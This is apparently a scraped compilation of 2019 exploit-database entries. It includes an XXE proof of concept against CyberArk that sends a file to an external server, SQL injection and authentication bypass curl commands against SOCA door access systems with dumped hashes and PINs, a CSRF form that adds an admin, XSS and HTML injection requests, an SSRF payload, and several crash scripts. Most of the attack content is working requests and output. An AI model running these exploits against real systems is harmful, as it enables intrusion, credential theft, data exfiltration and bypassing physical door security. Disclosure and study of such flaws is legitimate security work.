ISHACK AI BOT

# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery # Date: 2/26/2019 # Exploit Author: Alexandre Basquin # Vendor Homepage: https://blog.thehive-project.org # Software Link: https://github.com/TheHive-Project/Cortex # Version: Cortex <= 2.1.3 # Tested on: 2.1.3 # CVE : CVE-2019-7652 # Exploit description The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability POC: 1. Create a new analysis 2. Select Data Type "URL" 3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22") 4. Result can be seen in the main dashboard. Reported to TheHive Project by Alexandre Basquin on 1/24/2019 The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2 References: https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/

# -*- coding: utf-8 -*- # Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC) # Date: 08/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.jetaudio.com/ # Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe # Version: 2.0.1.0 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt" # 2.- Copy the text from the generated LyricMaker.txt file to clipboard # 3.- Open JetLyric.exe or Lyric Maker # 4.- Paste clipboard in in the field "Title" # 5.- Go to file -> Save Lyric... # 6.- Save the file with any name, e.g 'sample.jlr' # 7.- Crashed buffer = "\x41" * 5000 f = open ("LyricMaker.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC) # Date: 08/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.jetaudio.com/ # Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe # Version: 8.1.7 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt" # 2.- Copy the text from the generated ConvertVideo.txt file to clipboard # 3.- Open JetVidCnv.exe or Video Converter # 4.- Click on the 'Add Files...' button and select a video file # 5.- Paste clipboard in in the field "File Naming" # 6.- Click on the 'Preview' button # 7.- Crashed buffer = "\x41" * 512 f = open ("ConvertVideo.txt", "w") f.write(buffer) f.close()

#Exploit Title: jetCast Server 2.0 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-09 #Vendor Homepage: http://www.jetaudio.com/ #Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe #Tested Version: 2.0 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: jetCast_Server_2.0.py #2.- Open jetCast.txt and copy content to clipboard #2.- Open jetCast Server #3.- Select Config #4.- In "Log directory" Paste ClipBoard #5.- Click on "Ok" #6.- Click on "Start" #7.- Crashed cod = "\x41" * 5000 f = open('jetCast.txt', 'w') f.write(cod) f.close()

# -*- coding: utf-8 -*- # Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC) # Date: 09/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.nsauditor.com # Software Link http://www.nsauditor.com/downloads/spotim_setup.exe # Version: 2.2 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt" # 2.- Copy the text from the generated SpotIM.txt file to clipboard # 3.- Open SpotIM # 4. Select "Register" > "Enter Registration Code..." # 5.- Paste clipboard in the Name/Key field # 6.- Click 'OK' # 7.- Crashed buffer = "\x41" * 1000 f = open ("SpotIM.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC) # Date: 09/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.nsauditor.com # Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe # Version: 1.1.5 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt" # 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard # 3.- Open SpotPalTalk # 4. Select "Register" > "Enter Registration Code..." # 5.- Paste clipboard in the Name/Key field # 6.- Click 'OK' # 7.- Crashed buffer = "\x41" * 1000 f = open ("SpotPaltalk.txt", "w") f.write(buffer) f.close()

#Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-09 #Vendor Homepage: https://xlinesoft.com/ #Software Link: https://xlinesoft.com/asprunnernet/download.htm #Tested Version: 10.1 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ASPRunner_net_10_1.py #2.- Open ASPRunner_10_1.txt and copy content to clipboard #3.- Open ASPRunner.NET #4.- Click on "Next" > Select "SQLite" database > click on "Next" #5.- Click on "Create new database" #6.- In "Table name" field Paste Clipboarad #7.- Click on "Create table" #8.- Crashed cod = "\x41" * 10000 f = open('ASPRunner_10_1.txt', 'w') f.write(cod) f.close()

# Exploit Title: dotCMS 5.1.1 - HTML Injection # Date: 2019-05-09 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://dotcms.com/ # Software Link: https://github.com/dotCMS # Software: dotCMS # Product Version: 5.1.1 # Vulernability Type: Code Injection # Vulenrability: HTML Injection and Cross-site Scripting # CVE: CVE-2019-11846 # HTTP POST Request : POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669 Content-Length: 101313 DNT: 1 Connection: close Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm Upgrade-Insecure-Requests: 1 -----------------------------5890268631313811380287956669 Content-Disposition: form-data; name="binary3FileUpload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")> .json" Content-Type: application/json # HTTP Response : HTTP/1.1 200 Content-Length: 0 Date: Thu, 09 May 2019 10:23:44 GMT Connection: close

#Exploit Title: PHPRunner 10.1 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-09 #Vendor Homepage: https://xlinesoft.com/ #Software Link: https://xlinesoft.com/phprunner/download.htm #Tested Version: 10.1 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: PHPRunner_10_1.py #2.- Open PHPRunner_10_1.txt and copy content to clipboard #3.- Open PHPRunner #4.- Click on "Next" > Select "Microsoft Access" database > click on "Next" #5.- Click on "Create new database" > click on "Create table" #6.- Select "Create dashboard" > in "Name" field Paste Clipboarad #7.- Click on "Ok" #8.- Crashed cod = "\x41" * 10000 f = open('PHPRunner_10_1.txt', 'w') f.write(cod) f.close()

# Exploit Title: RICOH SP 4510DN Printer - HTML Injection # Date: 2019-05-06 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ricoh.com/ # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html # Software: RICOH Printer # Product Version: SP 4510DN # Vulernability Type: Code Injection # Vulenrability: HTML Injection # CVE: CVE-2019-11845 # An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter. # HTTP POST Request : POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/web/entry/en/address/adrsList.cgi Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 102 DNT: 1 Connection: close Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857 mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E # HTTP Response : HTTP/1.1 200 OK Date: Mon, 06 May 2019 11:42:46 GMT Server: Web-Server/3.0 Content-Type: text/plain Expires: Mon, 06 May 2019 11:42:46 GMT Set-Cookie: cookieOnOffChecker=on; path=/ Connection: close [14]

# Exploit Title: RICOH SP 4520DN Printer - HTML Injection # Date: 2019-05-06 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ricoh.com/ # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html # Software: RICOH Printer # Product Version: SP 4520DN # Vulernability Type: Code Injection # Vulenrability: HTML Injection # CVE: CVE-2019-11844 # An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi # entryNameIn or entryDisplayNameIn parameter. # HTTP POST Request : POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/web/entry/en/address/adrsList.cgi Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 219 DNT: 1 Connection: close Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008 mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 # HTTP Response : HTTP/1.1 200 OK Date: Mon, 06 May 2019 11:00:09 GMT Server: Web-Server/3.0 Content-Type: text/plain Expires: Mon, 06 May 2019 11:00:09 GMT Set-Cookie: cookieOnOffChecker=on; path=/ Connection: close [14]

# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML authentication # Date: 10/05/2019 # Exploit Author: Marcelo Toran (@spamv) # Vendor Homepage: https://www.cyberark.com # Version: <=10.7 # CVE : CVE-2019-7442 -----------Product description The CyberArk Enterprise Password Vault is a privileged access security solution to store, monitor and rotate credentials. The main objective of the solution is protecting the privileged accounts that are used to administrate the systems of the organisations. -----------Vulnerability description This vulnerability allows remote attackers to disclose sensitive information or potentially bypass the authentication system. -----------Vulnerability Details # Exploit Title: XML External Entity (XXE) Injection in SAML authentication # Affected Component: Password Vault Web Access (PVWA) # Affected Version: <=10.7 # Vendor: CyberArk # Vendor Homepage: https://www.cyberark.com # Date: 18/12/2018 # CVSS Base Score: 7.5 (High) # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N # Exploit Author: Marcelo Torán (Nixu Corporation) # CVE: CVE-2019-7442 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442 -----------Technical Description It has been found that the XML parser of the SAML authentication system of the Password Vault Web Access (PVWA) is vulnerable to XML External Entity (XXE) attacks via a crafted DTD. No user interaction or privileges are required as the vulnerability is triggered in pre-authentication. The vulnerable component is: https://example.com/PasswordVault/auth/saml The vulnerable argument: SAMLResponse -----------POC # pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration: <!ENTITY % data SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>"> # The malicious XML payload where is defined the address of the external entity defined in the previous step: <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd"> %sp; %param1; ]> <r>&exfil;</r> # XML payload base64 encoded + equal symbols URL encoded: PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d # CURL command to exploit the XXE: curl -i -s -k -X $'POST' \ -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \ $'https://example.com/PasswordVault/auth/saml/' # Checking the logs of the external server: example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 - example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 - # And decoding the content of the logs it's possible to read the requested file of the machine: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 -----------Timeline 18/12/2018 – Vulnerability discovered 10/01/2019 – Vendor notified 23/01/2019 – Vulnerability accepted 05/02/2019 – CVE number requested 05/02/2019 – CVE number assigned 19/02/2019 – Vendor released a patch 19/02/2019 – Advisory released -----------Proof of Concept (PoC) https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/

#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-12 #Vendor Homepage: www.nsauditor.com #Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe #Tested Version: 2.4.6 #Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: SpotMSN_2.4.6.py #2.- Open SpotMSN.txt and copy content to clipboard #3.- Open SpotMSN #4.- Select "Register" > "Enter Registration Code..." #5.- In "Name/Key" paste Clipboard #6.- Click "Ok" #7.- Crarshed cod = "\x41" * 300 f = open('SpotMSN.txt', 'w') f.write(cod) f.close()

SOCA Access Control System 180612 SQL Injection And Authentication Bypass Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include proximity and fingerprint access control system, time and attendance, electric locks, card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard. Desc: The Soca web access control system suffers from multiple SQL Injection vulnerabilities. Input passed via multiple POST parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. It allows the attacker to remotely disclose password hashes and login with MD5 hash with highest privileges resulting in unlocking doors and bypass the physical access control in place. Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 Apache/2.2.22 (Win32) PHP/5.4.13 Firebird/InterBase DBMS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5519 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php 20.04.2018 -- Authentication bypass / SQL injection via pos_id POST parameter in Login.php: ----------------------------------------------------------------------------- -version 141007 # curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\ "http://10.0.0.4/Login/Login.php" HTTP/1.1 200 OK Date: Fri, 03 May 2018 13:37:25 GMT Server: Apache/2.2.22 (Win32) PHP/5.4.13 X-Powered-By: PHP/5.4.13 Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5 Content-Type: text/html true Authentication bypass / SQL injection via ID POST parameter in Login.php: ========================================================================= -version 180612 # curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\ "http://10.0.0.3/Login/Login.php" {"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}} Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php: ============================================================================= Dump current user: ------------------ # curl -X POST --data "cidx=144 and 1=(user)"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "SYSDBA"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Dump table: ----------- # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "USERS"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Dump column: ------------ # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "U_NAME"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Dump column: ------------ # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "U_PASSWORD"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Dump username and Idx from USERS table: --------------------------------------- # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "USER1"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Dump passwords from UAC table: ------------------------------ # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\ "http://10.0.0.3/Card/Card_Edit_GetJson.php"\ -H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" Warning: ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 Login with MD5: =============== # curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng" "http://10.0.0.3/Login/Login.php"\ {"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}

#Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-12 #Vendor Homepage: www.nsauditor.com #Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe #Tested Version: 2.1.8 #Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: DNSS_2.1.8.py #2.- Open DNSS.txt and copy content to clipboard #3.- Open Dnss #4.- Select "Register" > "Enter Registration Code..." #5.- In "Name/Key" paste Clipboard #6.- Click "Ok" #7.- Crarshed cod = "\x41" * 300 f = open('DNSS.txt', 'w') f.write(cod) f.close()

SOCA Access Control System 180612 Information Disclosure Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include proximity and fingerprint access control system, time and attendance, electric locks, card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard. Desc: Insecure direct object references occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system. Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 Apache/2.2.22 (Win32) PHP/5.4.13 Firebird/InterBase DBMS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5517 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php 20.04.2018 -- Authenticated users password hash disclosure via Get_Permissions_From_DB.php: ----------------------------------------------------------------------------- # curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" [{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}] Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard: ------------------------------------------------------------------------ # curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat {"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames": {"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling": 1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444", "Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[ {"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"}, {"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"}, {"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"}, {"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"}, {"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"}, {"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"}, {"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"}, {"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"}, {"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"}, {"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"}, {"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"}, {"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"}, {"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"}, {"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"}, {"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"}, {"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"}, {"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"}, {"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"}, {"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"}, {"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"}, {"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"}, {"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"}, {"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"}, {"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"}, {"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"}, {"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"}, {"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"}, {"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"}, ... ... ... phpinfo() disclosure: --------------------- # curl -s http://10.0.0.3/phpinfo.php

SOCA Access Control System 180612 CSRF Add Admin Exploit Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include Proximity and Fingerprint access control system, Time and Attendance, Electric Locks, Card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 Apache/2.2.22 (Win32) PHP/5.4.13 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5520 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php 20.04.2018 -- <html> <body> <script>history.pushState('', 'shpa', '/index-pc.php')</script> <form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST"> <input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' /> <input type="submit" value="Forge!" /> </form> </body> </html>

